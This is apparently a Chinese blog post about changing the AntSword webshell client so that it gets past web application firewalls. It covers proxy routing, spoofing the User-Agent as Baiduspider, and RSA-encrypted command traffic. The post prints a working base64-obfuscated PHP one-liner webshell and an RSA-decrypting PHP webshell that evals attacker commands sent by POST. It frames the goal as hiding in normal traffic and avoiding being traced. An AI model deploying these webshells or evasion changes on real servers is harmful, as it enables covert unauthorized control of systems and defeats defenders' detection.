蚁剑特征性信息修改简单过WAF
0x00 前言
针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。
0x01 修改位置
蚁剑代理通道
UA特征伪造
RSA流量加密
0x02 具体操作
1.蚁剑代理通道
蚁剑代理通道设置(前提是必须有这个代理):
2.UA特征伪造
蚁剑默认UA抓包:
主要修改的位置:
/modules/request.js
这边主要是推荐百度UA,具体自己可以百度下其他UA,都可以根据需要来进行设置:
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
原来的UA:
UA修改后(百度UA爬虫):
/modules/update.js
同样的方法,将UA头修改为百度爬虫:
修改前:
修改后UA头:
通过以上修改后,抓包查看:
3.RSA流量加密
蚁剑从2.1开始支持了RSA加密算法,但是仅仅支持php。
在我们隐藏流量中无非就是采用对称密钥加密和非对称密钥加密。
<?php $k=base64_decode('YXNzZXJ0'); $k($_POST['cmd']); ?>注意这里YXNzZxJ0 base64解密为assert,eval不可以。
因为eval属于语言构造器,在php中不能来回调,类似call_user_function()。
其中数据请求包中存在eval关键字,还是容易被waf检测到,所以UA头一定要记得修改。
采用RSA加密
新建一个rsa编码器
<?hphp
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjQSEjYvGaB7q7G5bjKs2b+v34
XZ5/XhHDScxpv88C+fDv6IwxErr0kwcOp+an21tTtRF7Wl4MbEksL6wE3PNPt39k
8i4PBfg51IjBYOmer8AHqr9qyDZq5XgK65yOCWsOIN8+fuP7DtvRxfTFoBNK6O3N
eAKyYF0SRzIqPz8CvwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}
}
eval($cmd);
0x03 总结
细节决定成败,针对于WAF和内网流量设备的检测,使用加密流量去混淆在正常流量中,使用代理模式,防止间接性溯源。如果有更好的绕过方式和流量混淆方式,请及时联系,共同学习进步。
蚁剑特征性信息修改简单过WAF相关推荐
- 我不允许还有人没下载使用中国蚁剑,修改蚁剑特征冲它
目录 一.中国蚁剑下载 二.中国蚁剑安装 第一步:解压后,打开加载器antsword-Loder文件,并运行AntSword.exe程序 第二步:再次打开AntSword.exe,就能再次运行了 三. ...
- 渗透测试-流量加密之冰蝎蚁剑
文章目录 前言 冰蝎 PHP冰蝎马 通信数据包 冰蝎初体验 冰蝎攻与防 蚁剑 蚁剑的安装 蚁剑初体验 蚁剑编码器 蚁剑攻与防 总结 前言 一句话木马是一般是指一段短小精悍的恶意代码,这段代码可以用作一 ...
- 【WAF绕过-权限控制工具】菜刀、蚁剑、冰蝎 下载、使用方法
一.菜刀: 1.1.简介:中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用.只要支持动态脚本的网站,都可以用中国菜刀来进行管理1.2.功能:主要功能有:文件管理,虚拟终端,数据库管理1. ...
- 攻防兼备:中国蚁剑使用指南及特征流量
中国蚁剑是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征,兼顾攻防两端. 蚁剑下载安装参考:中国蚁剑(antSw ...
- 菜刀,蚁剑,冰蝎,哥斯拉的流量特征
蚁剑: ini_set ini_set_time ini_set_limit @ini_set("display_errors","0") 部分代码明文传输,较 ...
- 菜刀、冰蝎、蚁剑、哥斯拉的流量特征
干货|菜刀.冰蝎.蚁剑.哥斯拉的流量特征 文章目录 干货|菜刀.冰蝎.蚁剑.哥斯拉的流量特征 菜刀流量特征 蚁剑(PHP用base64加密): 冰蝎(AES对称加密): 哥斯拉(base64加密): ...
- 中国蚁剑下载、安装、使用教程
文章目录 中国蚁剑下载.安装.使用教程 一.中国蚁剑下载 二.中国蚁剑安装 三.中国蚁剑使用 1.添加一个shell 2.插件 3.关于编码器 4.user-agent修改 中国蚁剑下载.安装.使用教 ...
- 中国蚁剑的下载、安装与使用
一.中国蚁剑下载.安装 百度网盘链接:https://pan.baidu.com/s/1Fl0_hFtCtfUgcNIOwKeGEA 提取码:nvjc 共包含2个文件: antSword.zip An ...
- 蚁剑软件的配置与应用
蚁剑软件的配置与应用 蚁剑(antSword)是一款开源的网站管理软件,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,由于蚁剑(antSword)所有脚本的源代码均来自中国菜刀, ...
最新文章
- Android ScrollView 滑动指定的距离
- DeepMind 的2017:有 AlphaGo,更有社会责任
- c语言循环练习[xcode]
- 计算字符串和文件的MD5值
- SharpUpdater:开源的.NET桌面程序自动更新组件
- 命令行编译_新鲜货:C++ Build Insights告诉你为啥你的代码编译这么慢
- eclipse配置了maven,项目报错
- js截屏 video_js获取video任意时间的画面截图
- 分支定界法上下界_分支定界(Branch-and-Cut)方法的逻辑
- PAT甲级 -- 1005 Spell It Right (20 分)
- 第一次项目之后...
- linux之hexdump命令
- 关于怎么获取jsp的web站点的目录问题
- firstchild.data与childNodes[0].nodeValue意思
- 《例说8051:单片机程序设计案例教程》——第 2 章 输出口的应用
- Visual Studio 2008下设置OpenCV
- ueditor+asp.net异步提交,可以实现了,嘿嘿
- java super.getclass_详解java中this.getClass()和super.getClass()的实例
- java将Word文件转换为html文件
- session timer(一)
热门文章
- 左击鼠标出现右击选项是怎么回事_跟着诗妍姐姐学电脑——鼠标
- 新知客:现代“买椟还珠”故事
- vue_axios详解
- 30行代码AC_HDU-5933 ArcSoft‘s Office Rearrangement(模拟+题解报告)
- php论坛有哪些_建网站的软件哪个好?建网站的软件有哪些?
- android微信动画制作,动画制作轻量级SDK:PAG六大优势助力开发
- shell 非_Shell基本操作(一)
- windows7系统损坏修复_修复损坏的系统文件,就用系统文件检查器SFC,简单高效...
- 互换性与技术测量电子版_181套建设工程全套资料表格,从开工到完工,完整电子版手慢无...
- c++ windows 点击按钮跳转另一个窗体_PyQt5学习笔记(一)窗体控制